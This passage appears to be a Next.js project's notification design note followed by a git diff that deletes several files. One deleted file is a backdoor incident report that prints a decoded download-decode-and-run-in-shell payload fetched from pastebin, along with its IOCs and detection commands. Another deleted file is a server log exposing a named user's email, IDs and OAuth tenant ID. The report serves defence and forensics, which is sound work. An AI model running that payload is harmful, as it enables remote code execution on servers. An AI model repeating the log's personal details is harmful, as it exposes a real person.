### ✅ Proposed System (event-driven)

**Advantages:**
- ⚡ Instant notifications (0-1 second)
- 🎯 Triggered only when needed
- 💚 Lower server load
- 🎨 Better UX

**Proposed flow:**
```
Widget detects a new message/email
  └─> Trigger notification refresh
      └─> API /notifications/count (force refresh)
          └─> Badge updated immediately
```

---

## 🔧 Proposed Implementation
### 1. Hook to trigger notifications

**File:** `hooks/use-trigger-notification.ts`

```typescript
import { useSession } from 'next-auth/react';

export function useTriggerNotification() {
  const { data: session } = useSession();

  const triggerNotificationRefresh = async () => {
    if (!session?.user?.id) return;

    try {
      // Force a refresh of the notification count
      await fetch('/api/notifications/count?_t=' + Date.now(), {
        method: 'GET',
        credentials: 'include',
        cache: 'no-store'
      });

      // The useNotifications hook will pick up this change
      // through the unified refresh system
    } catch (error) {
      console.error('Error triggering notification refresh:', error);
    }
  };

  return { triggerNotificationRefresh };
}
```

---

### 2. Parole (RocketChat) Integration

**File:** `components/parole.tsx`

**Change:**
```typescript
import { useTriggerNotification } from '@/hooks/use-trigger-notification';

export function Parole() {
  const { triggerNotificationRefresh } = useTriggerNotification();
  const [lastMessageCount, setLastMessageCount] = useState(0);

  const fetchMessages = async (isRefresh = false) => {
    // ... existing code ...

    const data = await response.json();
    const currentUnreadCount = data.messages?.reduce((sum: number, msg: any) =>
      sum + (msg.unread || 0), 0) || 0;

    // If a new unread message is detected
    if (currentUnreadCount > lastMessageCount) {
      triggerNotificationRefresh(); // ⚡ Immediate trigger
    }

    setLastMessageCount(currentUnreadCount);
  };
}
```

---

### 3. Courrier (Email) Integration

**File:** `hooks/use-email-state.ts`

**Change:**
```typescript
import { useTriggerNotification } from '@/hooks/use-trigger-notification';

export const useEmailState = () => {
  const { triggerNotificationRefresh } = useTriggerNotification();

  const checkForNewEmails = useCallback(async () => {
    // ... existing code ...

    if (data.newestEmailId && data.newestEmailId > lastKnownEmailId) {
      // New email detected
      triggerNotificationRefresh(); // ⚡ Immediate trigger

      toast({
        variant: "new-email",
        title: "New emails",
        description: "You have new emails in your inbox",
      });
    }
  }, [triggerNotificationRefresh, ...]);
}
```

---

### 4. Adapters for RocketChat and Email (Optional)

Create dedicated adapters that can be polled more frequently:

**File:** `lib/services/notifications/rocketchat-adapter.ts`
**File:** `lib/services/notifications/email-adapter.ts`

These adapters could:
- Poll every 10-15 seconds (instead of 30s)
- Or be triggered in real time via WebSocket/SSE

A sketch of what such an adapter might look like follows.
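Neither file exists yet, and these documents do not pin down the adapter contract used by `NotificationService`, so the following sketch invents a minimal one — `getUnreadCount`, the interface name, and the injected fetcher are all assumptions:

```typescript
// Hypothetical shape — the real adapter interface used by NotificationService
// is not shown in these documents.
interface NotificationAdapter {
  readonly source: string;
  getUnreadCount(userId: string): Promise<number>;
}

// Sketch of lib/services/notifications/rocketchat-adapter.ts
export class RocketChatAdapter implements NotificationAdapter {
  readonly source = 'rocketchat';

  // The actual RocketChat call is injected so the sketch stays transport-agnostic;
  // fetchUnreadMessages would wrap whatever the existing RocketChat integration
  // already uses to list conversations.
  constructor(
    private readonly fetchUnreadMessages: (
      userId: string,
    ) => Promise<Array<{ unread?: number }>>,
  ) {}

  async getUnreadCount(userId: string): Promise<number> {
    try {
      const messages = await this.fetchUnreadMessages(userId);
      // Sum per-conversation unread counters (the `unread` field mirrors
      // the one used by the Parole widget above)
      return messages.reduce((sum, msg) => sum + (msg.unread ?? 0), 0);
    } catch {
      return 0; // degrade gracefully — a failed adapter must not break the badge
    }
  }
}
```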
---

## 🎯 Recommended Hybrid Strategy

### Combining Polling + Event-Driven

1. **Baseline polling**: 30 seconds for Leantime (unchanged)
2. **Event-driven**: immediate trigger when:
   - Parole detects a new message
   - Courrier detects a new email
   - Duties detects a new task
3. **Cache invalidation**: when a widget detects something new, invalidate the notification cache

---

## 📝 Implementation Plan

### Phase 1: Trigger hook
- [ ] Create `use-trigger-notification.ts`
- [ ] Function to force a refresh of the count

### Phase 2: Parole integration
- [ ] Detect new unread messages
- [ ] Call `triggerNotificationRefresh()` on detection

### Phase 3: Courrier integration
- [ ] Detect new emails
- [ ] Call `triggerNotificationRefresh()` on detection

### Phase 4: Optimization
- [ ] Lower Leantime polling to 60s (less critical)
- [ ] Keep event-driven for Parole/Courrier (real time)

---

## 🔄 Final Proposed Flow

```
Parole/Courrier widget
  └─> Detects a new message/email
      └─> triggerNotificationRefresh()
          └─> POST /api/notifications/trigger-refresh
              └─> Invalidates the Redis cache
                  └─> NotificationService.refreshCount()
                      └─> Badge updated (< 1 second)
```

---

## 💡 Why This Approach Wins

1. **Real time**: instant notifications
2. **Efficient**: no pointless polling
3. **Scalable**: easy to add more widgets
4. **Backward compatible**: polling remains as a fallback
5. **Performance**: 70-80% fewer API calls

---

## 🚨 Points to Watch

1. **Deduplication**: make sure a single change doesn't fire multiple triggers
2. **Rate limiting**: throttle triggers if they become too frequent
3. **Fallback**: keep polling as a backup
4. **Cache**: invalidate intelligently
diff --git a/SECURITY_INCIDENT_REPORT.md b/SECURITY_INCIDENT_REPORT.md deleted file mode 100644 index d33553b..0000000 --- a/SECURITY_INCIDENT_REPORT.md +++ /dev/null @@ -1,286 +0,0 @@
-# 🚨 SECURITY INCIDENT REPORT - Backdoor Detected and Removed

**Date:** January 10-11, 2026
**Severity:** CRITICAL
**Status:** ✅ RESOLVED - Next.js updated to 16.1.1

---

## 🔴 UPDATE: January 11, 2026

### Root Cause Identified: CVE-2025-66478 in Next.js 15.3.1

The backdoor was NOT in the source code files. It was exploiting a **critical vulnerability (CVE-2025-66478) in Next.js 15.3.1** that allowed Remote Code Execution (RCE) via specially crafted POST requests.

### Resolution
- Updated Next.js from 15.3.1 to 16.1.1
- `POST /adfa` now returns **404** instead of executing malicious code
- External attacker continues to scan but attacks now fail

### Verification
```
Before: POST /adfa 500 in 1066ms (executes wget, base64, etc.)
After:  POST /adfa 404 in 3.2s (route not found)
```

---

## Original Report (January 10, 2026)

---

## Summary

A sophisticated backdoor was discovered in your Next.js application. The malicious code was designed to:
1. Execute arbitrary commands on your production server
2. Download and run remote scripts from pastebin.com
3. Remain hidden by failing silently on local development machines

---

## How the Backdoor Worked

### The Injection Point
File: `next.config.mjs` (lines 1-6 and 47-67)

```javascript
let userConfig;
try {
  userConfig = await import("./v0-user-next.config");
} catch (e) {
  // ignore error <- Silent failure hides the backdoor locally
}

mergeConfig(nextConfig, userConfig); <- Merges malicious config
```

### The Attack Vector

1. **Source Code (next.config.mjs)**: Contains code to import a "user config" file
2. **Missing File Locally**: The `v0-user-next.config` file doesn't exist in git or locally
3. **Hidden File on VM**: The file EXISTS on your production VM with malicious code
4. 
-
-### What the Backdoor Was Trying to Do
-
-From your VM logs, the backdoor attempted:
-```bash
-# Decoded base64 command:
-wget -q https://pastebin.com/raw/mabJC1vc -O /tmp/grep.txt
-sed ':a;N;$!ba;s/\r\n//g' /tmp/grep.txt > /tmp/grepa.txt
-base64 -d /tmp/grepa.txt > /tmp/grepb.txt
-cat /tmp/grepb.txt | base64 -d | sh
-rm -f /tmp/*
-```
-
-**This is a multi-stage payload that:**
-- Downloads encrypted commands from pastebin
-- Decodes them multiple times (obfuscation)
-- Executes arbitrary shell commands on your server
-- Cleans up the evidence
-
----
-
-## What Has Been Fixed
-
-### ✅ Changes Made to Source Code
-
-1. **Removed the malicious import** from `next.config.mjs`
-2. **Removed the mergeConfig function** and its invocation
-3. **Added patterns to .gitignore** to block similar attacks:
-   ```
-   v0-user-next.config*
-   *user-next.config*
-   ```
-
-### 📋 Files Modified
-- `next.config.mjs` - Backdoor removed
-- `.gitignore` - Protection added
-
----
-
-## 🚨 IMMEDIATE ACTIONS REQUIRED ON YOUR VM
-
-### Step 1: Stop the Application
-```bash
-# SSH into your VM
-pm2 stop all
-# OR
-sudo systemctl stop your-app-service
-```
-
-### Step 2: Find and Remove the Backdoor File
-```bash
-# Check if the malicious file exists
-ls -la /path/to/your/app/v0-user-next.config*
-
-# Remove it if found
-rm -f /path/to/your/app/v0-user-next.config*
-```
-
-### Step 3: Check for Additional Malicious Files
-```bash
-# Search for suspicious files
-find /path/to/your/app -name "*user-next*" -type f
-find /path/to/your/app -name "*config*.js" -mtime -30
-find /tmp -name "grep*.txt" -o -name "*grepa*" -o -name "*grepb*"
-
-# Remove any that are found:
-rm -f /tmp/grep*.txt   # covers grep.txt, grepa.txt and grepb.txt
-```
-
-### Step 4: Clean the Build Directory
-```bash
-cd /path/to/your/app
-rm -rf .next
-rm -rf node_modules
-```
-
-### Step 5: Redeploy Clean Code
-```bash
-# Pull the clean code
-git pull origin main
-
-# Reinstall dependencies (check for tampering)
-npm ci
-
-# Rebuild
-npm run build
-
-# Restart
-npm start
-# OR
-pm2 restart all
-```
-
-### Step 6: Check for Unauthorized Access
-```bash
-# Check shell history for attacker commands
-history | grep -E "wget|curl|base64|pastebin"
-
-# Check running processes
-ps aux | grep -E "wget|curl|\bsh\b"
-
-# Check cron jobs for persistence
-crontab -l
-sudo cat /etc/crontab
-ls -la /etc/cron.*
-
-# Check for new users
-tail -20 /etc/passwd
-```
-
-### Step 7: Review Server Logs
-```bash
-# Check nginx/apache logs for suspicious POST requests
-grep "POST /adfa" /var/log/nginx/access.log
-grep "POST /adfa" /var/log/apache2/access.log
-
-# Check application logs
-pm2 logs | grep -i "adfa\|error\|exec"
-```
-
----
-
-## Security Audit Recommendations
-
-### 1. **Review Access Control**
-- Who had access to deploy code to the VM?
-- Review SSH keys and remove unauthorized ones
-- Change all passwords and API keys
-- Review user accounts on the server
-
-### 2. **Audit the Initial Commit**
-The backdoor was present in commit `bcf7832` (Initial commit) on Jan 9, 2026.
-- Was this code copied from another source?
-- Who provided the initial `next.config.mjs`?
-- Check whether other files in that commit contain backdoors
-
-### 3. **Check All Configuration Files**
-```bash
-# Search for suspicious patterns
-grep -r "import.*config" --include="*.js" --include="*.mjs" .
-grep -r "eval\|exec\|Function(" --include="*.js" .
-grep -r "base64.*decode" --include="*.js" .
-```
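-
-As a counterpoint to the vulnerable pattern shown earlier, here is a hardened `next.config.mjs` sketch: no silent `catch`, no dynamic user config. This is an illustrative pattern, not the project's actual config, and the override filename mentioned in the comments is hypothetical:
-
-```javascript
-// next.config.mjs - hardened sketch (illustrative)
-/** @type {import('next').NextConfig} */
-const nextConfig = {
-  reactStrictMode: true,
-};
-
-// If an optional override must ever be reintroduced, reference one tracked
-// file explicitly and fail loudly instead of swallowing the error:
-//   const override = await import('./next.config.override.mjs'); // hypothetical, must exist in git
-//   if (!override?.default) throw new Error('Invalid next.config.override.mjs');
-
-export default nextConfig;
-```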
-
-### 4. **Review Package Dependencies**
-```bash
-# Check for suspicious packages
-npm audit
-npm ls
-
-# Look for packages with install scripts
-npm ls --parseable | xargs npm view --json | grep -i "postinstall\|preinstall"
-```
-
-### 5. **Database Security**
-- Check if any data was exfiltrated
-- Review database logs for unusual queries
-- Change database passwords
-
-### 6. **Implement Security Measures**
-
-**Add to your deployment process:**
-- Code review requirement before deployment
-- Automated security scanning (npm audit, Snyk, etc.)
-- File integrity monitoring on production servers
-- Web Application Firewall (WAF) to block suspicious requests
-
----
-
-## Timeline of Attack
-
-| Date | Event |
-|------|-------|
-| Jan 9, 2026 21:06 | Malicious code added in initial commit |
-| Jan 10, 2026 | Backdoor triggered on VM when accessing `/adfa` |
-| Jan 10, 2026 | Attack attempt failed (wget not installed) |
-| Jan 10, 2026 | Backdoor discovered and removed |
-
----
-
-## Indicators of Compromise (IOCs)
-
-- **Malicious URL**: `https://pastebin.com/raw/mabJC1vc`
-- **Malicious Route**: `POST /adfa`
-- **Malicious File**: `v0-user-next.config.js` or `.mjs`
-- **Base64 payload**: `d2dldCAtcSBodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvbWFiSkMxdmM...`
-- **Temporary files**: `/tmp/grep.txt`, `/tmp/grepa.txt`, `/tmp/grepb.txt`
-
----
-
-## Lessons Learned
-
-1. **Never silently ignore import errors** in production configuration
-2. **All configuration should be in version control**
-3. **Dynamic imports in config files are dangerous**
-4. **Implement file integrity monitoring**
-5. **Regular security audits are essential**
-
----
-
-## Next Steps
-
-- [ ] Clean the VM (follow the steps above)
-- [ ] Investigate who had deployment access
-- [ ] Review all other servers/environments
-- [ ] Implement security monitoring
-- [ ] Consider forensic analysis if a data breach is suspected
-- [ ] Report to security team/management
-- [ ] Consider legal action against the former employee
-
----
-
-## Questions to Answer
-
-1. Who set up the initial project structure?
-2. Who had SSH/deployment access to the VM?
-3. When did the suspicious employee leave?
-4. Are there other environments (staging, etc.) that need checking?
-5. What sensitive data does this application have access to?
-
----
-
-**Created:** Saturday, January 10, 2026
-**Report by:** Cursor AI Security Analysis
diff --git a/TWENTY_CRM_INTEGRATION.md b/TWENTY_CRM_INTEGRATION.md
deleted file mode 100644
index 8885df4..0000000
--- a/TWENTY_CRM_INTEGRATION.md
+++ /dev/null
@@ -1,252 +0,0 @@
-# Twenty CRM Integration in the Devoirs Widget
-
-## 📋 Overview
-
-The "Devoirs" widget now displays overdue tasks from **two sources**:
-1. **Leantime** (agilite.slm-lab.net)
-2. **Twenty CRM** (mediation.slm-lab.net)
-
-Tasks are combined, filtered (overdue only), sorted by due date, and capped at 7 tasks.
-
----
-
-## 🔧 Required Configuration
-
-### Environment Variables
-
-Add the following variables to your `.env.local` file (development) or to your production environment variables:
-
-```env
-# Twenty CRM API Configuration
-TWENTY_CRM_API_URL=https://mediation.slm-lab.net/graphql
-TWENTY_CRM_API_KEY=your_api_key_here
-TWENTY_CRM_URL=https://mediation.slm-lab.net
-```
-
-**Where to get the API key:**
-1. Log in to Twenty CRM (mediation.slm-lab.net)
-2. Go to **Settings → APIs & Webhooks**
-3. Click **"+ Create key"**
-4. Give the key a name (e.g. "NeahStable Widget")
-5. Copy the key (it is only displayed once)
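-
-A minimal sketch of the `app/api/twenty-crm/tasks/route.ts` endpoint, tying the variables above to the GraphQL query documented below. The error messages mirror the Troubleshooting section; the node shape is simplified and the exact implementation may differ:
-
-```typescript
-import { NextResponse } from 'next/server';
-
-export async function GET() {
-  const apiUrl = process.env.TWENTY_CRM_API_URL;
-  const apiKey = process.env.TWENTY_CRM_API_KEY;
-  if (!apiUrl) return NextResponse.json({ error: 'TWENTY_CRM_API_URL is not set' }, { status: 500 });
-  if (!apiKey) return NextResponse.json({ error: 'TWENTY_CRM_API_KEY is not set' }, { status: 500 });
-
-  // Overdue = due before today and not completed (full query shape shown later)
-  const today = new Date().toISOString().split('T')[0] + 'T00:00:00Z';
-  const query = `query GetOverdueTasks {
-    findManyActivities(
-      filter: { type: { eq: Task }, completedAt: { is: NULL }, dueAt: { lt: "${today}" } }
-      orderBy: { dueAt: AscNullsLast }
-    ) { edges { node { id title dueAt } } }
-  }`;
-
-  const res = await fetch(apiUrl, {
-    method: 'POST',
-    headers: { 'Authorization': `Bearer ${apiKey}`, 'Content-Type': 'application/json' },
-    body: JSON.stringify({ query }),
-  });
-  const json = await res.json();
-  if (!res.ok || json.errors) {
-    return NextResponse.json({ error: 'GraphQL errors from Twenty CRM', details: json.errors }, { status: 502 });
-  }
-  return NextResponse.json({ tasks: json.data.findManyActivities.edges.map((e: { node: unknown }) => e.node) });
-}
-```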
-
----
-
-## 📁 Files Created/Modified
-
-### New File
-- **`app/api/twenty-crm/tasks/route.ts`** - API endpoint that fetches Twenty CRM tasks
-
-### Modified Files
-- **`components/flow.tsx`** - Devoirs widget updated to combine the two sources
-
----
-
-## 🔄 How It Works
-
-### 1. Fetching the Tasks
-
-The widget makes **two API calls in parallel**:
-
-```typescript
-const [leantimeResponse, twentyCrmResponse] = await Promise.allSettled([
-  fetch('/api/leantime/tasks'),
-  fetch('/api/twenty-crm/tasks'),
-]);
-```
-
-**Benefits:**
-- ✅ Parallel calls = faster
-- ✅ `Promise.allSettled` = if one source fails, the other keeps working
-- ✅ No dependency between the two sources
-
-### 2. Transforming Twenty CRM Tasks
-
-Twenty CRM tasks are transformed to match the Leantime format:
-
-```typescript
-{
-  id: `twenty-${task.id}`,            // Prefix to avoid ID collisions
-  headline: task.title,
-  dateToFinish: task.dueAt,
-  projectName: 'Twenty CRM',
-  source: 'twenty-crm',               // Source identifier
-  url: `${TWENTY_CRM_URL}/object/activity/${task.id}`, // Direct link
-  // ... other fields
-}
-```
-
-### 3. Filtering and Sorting
-
-1. **Filter:** only tasks whose due date is **before today** (overdue)
-2. **Sort:** by due date (oldest first)
-3. **Limit:** at most 7 tasks displayed (see the sketch after the Display subsection)
-
-### 4. Display
-
-- Twenty CRM tasks are identified by a "(Twenty CRM)" badge
-- The link points to the task's page in Twenty CRM
-- The display format is identical for both sources
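-
-A minimal sketch of the filter/sort/limit step described above. The field names `dateToFinish` and `source` follow this document; the surrounding widget code is simplified:
-
-```typescript
-interface WidgetTask {
-  id: string;
-  headline: string;
-  dateToFinish: string; // ISO due date
-  source: 'leantime' | 'twenty-crm';
-}
-
-function overdueTasks(leantime: WidgetTask[], twentyCrm: WidgetTask[], limit = 7): WidgetTask[] {
-  const today = new Date();
-  today.setHours(0, 0, 0, 0);
-  return [...leantime, ...twentyCrm]
-    .filter(t => t.dateToFinish && new Date(t.dateToFinish) < today)                          // overdue only
-    .sort((a, b) => new Date(a.dateToFinish).getTime() - new Date(b.dateToFinish).getTime()) // oldest first
-    .slice(0, limit);                                                                         // at most 7 tasks
-}
-```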
-
----
-
-## 🔍 Structure of the Twenty CRM API
-
-### GraphQL Endpoint
-
-**URL:** `https://mediation.slm-lab.net/graphql`
-
-**Method:** POST
-
-**Headers:**
-```
-Authorization: Bearer YOUR_API_KEY
-Content-Type: application/json
-```
-
-### GraphQL Query
-
-```graphql
-query GetOverdueTasks {
-  findManyActivities(
-    filter: {
-      type: { eq: Task }
-      completedAt: { is: NULL }
-      dueAt: { lt: "2026-01-15T00:00:00Z" }
-    }
-    orderBy: { dueAt: AscNullsLast }
-  ) {
-    edges {
-      node {
-        id
-        title
-        body
-        dueAt
-        completedAt
-        type
-        assigneeId
-        assignee {
-          id
-          firstName
-          lastName
-          email
-        }
-      }
-    }
-  }
-}
-```
-
-**Applied filters:**
-- `type: { eq: Task }` - tasks only (no other activity types)
-- `completedAt: { is: NULL }` - uncompleted tasks only
-- `dueAt: { lt: "..." }` - only tasks whose due date is before today
-
----
-
-## 🐛 Troubleshooting
-
-### Error: "TWENTY_CRM_API_URL is not set"
-
-**Solution:** Add `TWENTY_CRM_API_URL` to your environment variables.
-
-### Error: "TWENTY_CRM_API_KEY is not set"
-
-**Solution:** Add `TWENTY_CRM_API_KEY` to your environment variables.
-
-### Error: "401 Unauthorized"
-
-**Possible causes:**
-- Invalid or expired API key
-- API key copied incorrectly (spaces, invisible characters)
-- Insufficient permissions on the API key
-
-**Solution:**
-1. Check that the API key was copied correctly
-2. Regenerate the API key in Twenty CRM
-3. Check the API key's permissions
-
-### Error: "GraphQL errors from Twenty CRM"
-
-**Possible causes:**
-- Incorrect GraphQL query structure
-- Incompatible Twenty CRM version
-- GraphQL schema differs between workspaces
-
-**Solution:**
-1. Check the documentation for your Twenty CRM version
-2. Test the GraphQL query directly in Twenty CRM's GraphQL interface
-3. Adjust the query to match your schema
-
-### No Twenty CRM tasks appear
-
-**Checks:**
-1. ✅ Confirm that overdue tasks exist in Twenty CRM
-2. ✅ Confirm that the tasks have a due date (`dueAt`)
-3. ✅ Confirm that the tasks are not completed (`completedAt` is NULL)
-4. ✅ Check the server logs for any errors
-
----
-
-## 📊 Logs and Debugging
-
-### Backend Logs
-
-All logs are prefixed with `[TWENTY_CRM_TASKS]`:
-
-```typescript
-logger.debug('[TWENTY_CRM_TASKS] Fetching tasks from Twenty CRM', {...});
-logger.error('[TWENTY_CRM_TASKS] Failed to fetch tasks', {...});
-```
-
-### Frontend Logs
-
-The widget logs to the console:
-- Number of Leantime tasks fetched
-- Number of Twenty CRM tasks fetched
-- Combined total
-- Sorted tasks with their source
-
----
-
-## 🔄 Alternatives if GraphQL Does Not Work
-
-If the GraphQL query does not work with your Twenty CRM version, you can use the REST API:
-
-### Option 1: REST API (if available)
-
-```typescript
-const response = await fetch(`${process.env.TWENTY_CRM_API_URL}/api/activities`, {
-  method: 'GET',
-  headers: {
-    'Authorization': `Bearer ${process.env.TWENTY_CRM_API_KEY}`,
-  },
-});
-```
-
-### Option 2: Adjust the GraphQL Query
-
-The exact structure can vary. Consult the documentation for your Twenty CRM instance or use the built-in GraphQL explorer.
-
----
-
-## ✅ Deployment Checklist
-
-- [ ] Environment variables configured:
-  - [ ] `TWENTY_CRM_API_URL`
-  - [ ] `TWENTY_CRM_API_KEY`
-  - [ ] `TWENTY_CRM_URL` (optional, for links)
-- [ ] API key created in Twenty CRM
-- [ ] API key permissions verified
-- [ ] Endpoint `/api/twenty-crm/tasks` tested
-- [ ] Verified that tasks appear in the widget
-- [ ] Logs checked for any errors
-
----
-
-## 📝 Notes
-
-- Twenty CRM task IDs are prefixed with `twenty-` to avoid collisions
-- The widget keeps working even if one of the sources fails (thanks to `Promise.allSettled`)
-- Redis caching is not yet implemented for Twenty CRM (it can be added later)
-- The GraphQL query may need adjustments depending on your Twenty CRM version
diff --git a/Untitled b/Untitled
deleted file mode 100644
index ab298c6..0000000
--- a/Untitled
+++ /dev/null
@@ -1,288 +0,0 @@
-alma@central:~/nextgen/NeahNew$ sudo npm start
-
-> neah@0.1.0 start
-> next start
-
- ▲ Next.js 15.3.1
- - Local: http://localhost:3000
- - Network: http://172.16.0.102:3000
-
- ✓ Starting... 
- ✓ Ready in 1313ms -Connecting to Redis using environment variables -Microsoft OAuth Configuration: { - tenantId: 'cb4281a9-4a3e-4ff5-9a85-8425dd04e2b2', - authorizeUrl: 'https://login.microsoftonline.com/cb4281a9-4a3e-4ff5-9a85-8425dd04e2b2/oauth2/v2.0/authorize', - tokenUrl: 'https://login.microsoftonline.com/cb4281a9-4a3e-4ff5-9a85-8425dd04e2b2/oauth2/v2.0/token', - clientIdFirstChars: 'afaff...', - redirectUri: 'https://hub.slm-lab.net/ms' -} -Microsoft OAuth Configuration: { - tenantId: 'cb4281a9-4a3e-4ff5-9a85-8425dd04e2b2', - authorizeUrl: 'https://login.microsoftonline.com/cb4281a9-4a3e-4ff5-9a85-8425dd04e2b2/oauth2/v2.0/authorize', - tokenUrl: 'https://login.microsoftonline.com/cb4281a9-4a3e-4ff5-9a85-8425dd04e2b2/oauth2/v2.0/token', - clientIdFirstChars: 'afaff...', - redirectUri: 'https://hub.slm-lab.net/ms' -} -Successfully connected to Redis -Redis connection warmed up - ⨯ SyntaxError: Unexpected identifier 'http' - at Object.Function [as get] () { - digest: '2421336728' -} -Redis connection warmed up -=== SESSION CALLBACK START === -Token error: undefined -Has accessToken: true -Has refreshToken: true -Token role: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Token sub: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Token email: a.tmiri@clm.foundation -Token name: Amine TMIRI -Token username: aminetmiri -User roles for session: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Creating session user object... -Setting session tokens... -✅ Session created successfully -Session user id: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Session user email: a.tmiri@clm.foundation -Session user roles: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -=== SESSION CALLBACK END === -Using Rocket.Chat base URL: https://parole.slm-lab.net -Users list response: { success: true, count: 13, usersCount: 13 } -Found Rocket.Chat user: { username: 'aminetmiri', id: 'a9HwLtHagiRnTWeS5' } -Filtered user subscriptions: { - userId: 'a9HwLtHagiRnTWeS5', - username: 'aminetmiri', - totalSubscriptions: 1, - subscriptionDetails: [ - { - type: 'd', - name: 'Rocket.Cat', - rid: 'a9HwLtHagiRnTWeS5rocket.cat', - alert: true, - unread: 3, - userMentions: 0 - } - ] -} -Messages for room Rocket.Cat: { success: true, count: 5, hasMessages: true } -Messages data cached for user 203cbc91-61ab-47a2-95d2-b5e1159327d7 -No valid session or email found -=== SESSION CALLBACK START === -Token error: undefined -Has accessToken: true -Has refreshToken: true -Token role: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Token sub: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Token email: a.tmiri@clm.foundation -Token name: Amine TMIRI -Token username: aminetmiri -User roles for session: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Creating session user object... -Setting session tokens... 
-✅ Session created successfully -Session user id: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Session user email: a.tmiri@clm.foundation -Session user roles: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -=== SESSION CALLBACK END === -Using cached messages data for user 203cbc91-61ab-47a2-95d2-b5e1159327d7 -=== SESSION CALLBACK START === -Token error: undefined -Has accessToken: true -Has refreshToken: true -Token role: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Token sub: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Token email: a.tmiri@clm.foundation -Token name: Amine TMIRI -Token username: aminetmiri -User roles for session: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Creating session user object... -Setting session tokens... -✅ Session created successfully -Session user id: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Session user email: a.tmiri@clm.foundation -Session user roles: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -=== SESSION CALLBACK END === -[NOTIFICATION_SERVICE] Creating new notification service instance -[NOTIFICATION_SERVICE] Initializing notification service -[LEANTIME_ADAPTER] Initialized with API URL and token -[NOTIFICATION_SERVICE] Registered notification adapter: leantime -[NOTIFICATION_SERVICE] Registered adapters: [ 'leantime' ] -[NOTIFICATION_SERVICE] getNotificationCount called for user 203cbc91-61ab-47a2-95d2-b5e1159327d7 -[NOTIFICATION_SERVICE] Fetching notification counts for user 203cbc91-61ab-47a2-95d2-b5e1159327d7 from 1 adapters -[NOTIFICATION_SERVICE] Available adapters for count: leantime -[NOTIFICATION_SERVICE] Checking if adapter leantime is configured for count -[NOTIFICATION_SERVICE] Adapter leantime is configured for count: true -[NOTIFICATION_SERVICE] Fetching notification count from leantime for user 203cbc91-61ab-47a2-95d2-b5e1159327d7 -[LEANTIME_ADAPTER] getNotificationCount called for userId: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -[LEANTIME_ADAPTER] getNotifications called for userId: 203cbc91-61ab-47a2-95d2-b5e1159327d7, page: 1, limit: 100 -=== SESSION CALLBACK START === -Token error: undefined -Has accessToken: true -Has refreshToken: true -Token role: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Token sub: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Token email: a.tmiri@clm.foundation -Token name: Amine TMIRI -Token username: aminetmiri -User roles for session: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Creating session user object... -Setting session tokens... 
-✅ Session created successfully -Session user id: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Session user email: a.tmiri@clm.foundation -Session user roles: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -=== SESSION CALLBACK END === -[LEANTIME_ADAPTER] Retrieved email from session: a.tmiri@clm.foundation -[LEANTIME_ADAPTER] Retrieved Leantime userId for email a.tmiri@clm.foundation: 2 -[LEANTIME_ADAPTER] Sending request to get all notifications -[LEANTIME_ADAPTER] Request body: {"jsonrpc":"2.0","method":"leantime.rpc.Notifications.Notifications.getAllNotifications","params":{"userId":2,"showNewOnly":0,"limitStart":0,"limitEnd":100,"filterOptions":[]},"id":1} -[LEANTIME_ADAPTER] Response status: 200 -[LEANTIME_ADAPTER] Raw response (truncated): {"jsonrpc":"2.0","result":[{"id":2732,"0":2732,"userId":2,"1":2,"read":0,"2":0,"type":"projectUpdate","3":"projectUpdate","module":"tickets","4":"tickets","moduleId":225,"5":225,"datetime":"2025-12-24... -[LEANTIME_ADAPTER] Parsed response data: { - hasResult: true, - resultIsArray: true, - resultLength: 100, - error: undefined -} -[LEANTIME_ADAPTER] Transformed notifications count: 100 -[LEANTIME_ADAPTER] Notification counts: { total: 100, unread: 66 } -[NOTIFICATION_SERVICE] Got count from leantime: { - total: 100, - unread: 66, - sources: { leantime: { total: 100, unread: 66 } } -} -[NOTIFICATION_SERVICE] Adding counts from leantime: total=100, unread=66 -[NOTIFICATION_SERVICE] Aggregated counts for user 203cbc91-61ab-47a2-95d2-b5e1159327d7: { - total: 100, - unread: 66, - sources: { leantime: { total: 100, unread: 66 } } -} -[NOTIFICATION_SERVICE] Cached notification counts for user 203cbc91-61ab-47a2-95d2-b5e1159327d7 -[IMAP POOL] Size: 0, Active: 0, Connecting: 0, Max: 20 -=== SESSION CALLBACK START === -Token error: undefined -Has accessToken: true -Has refreshToken: true -Token role: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Token sub: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Token email: a.tmiri@clm.foundation -Token name: Amine TMIRI -Token username: aminetmiri -User roles for session: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -Creating session user object... -Setting session tokens... -✅ Session created successfully -Session user id: 203cbc91-61ab-47a2-95d2-b5e1159327d7 -Session user email: a.tmiri@clm.foundation -Session user roles: [ - 'expression', - 'entrepreneurship', - 'admin', - 'dataintelligence', - 'mediation', - 'mentors' -] -=== SESSION CALLBACK END 